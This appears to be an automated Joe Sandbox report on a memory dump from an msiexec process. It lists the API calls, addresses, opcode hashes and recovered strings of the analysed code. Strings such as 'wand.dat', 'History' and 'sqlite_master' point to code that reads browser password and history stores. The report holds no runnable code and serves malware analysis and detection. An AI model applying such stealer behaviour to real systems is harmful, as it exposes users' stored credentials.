                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                APIs
                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                • String ID: \StringFileInfo\
                                                                                • API String ID: 102104167-2245444037
                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _memicmpwcslen
                                                                                • String ID: @@@@$History
                                                                                • API String ID: 1872909662-685208920
                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004100FB
                                                                                • memset.MSVCRT ref: 00410112
                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                • String ID: </%s>
                                                                                • API String ID: 3400436232-259020660
                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                • String ID: caption
                                                                                • API String ID: 1523050162-4135340389
                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                APIs
                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 210187428-168460110
                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                • String ID: edit
                                                                                • API String ID: 2747424523-2167791130
                                                                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                • API String ID: 3150196962-1506664499
                                                                                • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp
                                                                                • String ID:
                                                                                • API String ID: 3384217055-0
                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                APIs
                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                • String ID:
                                                                                • API String ID: 1889144086-0
                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                APIs
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                • String ID:
                                                                                • API String ID: 1661045500-0
                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                APIs
                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                Strings
                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                • API String ID: 1297977491-2063813899
                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040560C
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.*$dat$wand.dat
                                                                                • API String ID: 2618321458-1828844352
                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                • String ID:
                                                                                • API String ID: 1549203181-0
                                                                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00412057
                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                • String ID:
                                                                                • API String ID: 3550944819-0
                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                APIs
                                                                                • free.MSVCRT ref: 0040F561
                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$free
                                                                                • String ID: g4@
                                                                                • API String ID: 2888793982-2133833424
                                                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                • memset.MSVCRT ref: 0040AF18
                                                                                • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1865533344-0
                                                                                • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004144E7
                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                • memset.MSVCRT ref: 0041451A
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1127616056-0
                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                • memset.MSVCRT ref: 0042FED3
                                                                                • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: sqlite_master
                                                                                • API String ID: 438689982-3163232059
                                                                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3917621476-0
                                                                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
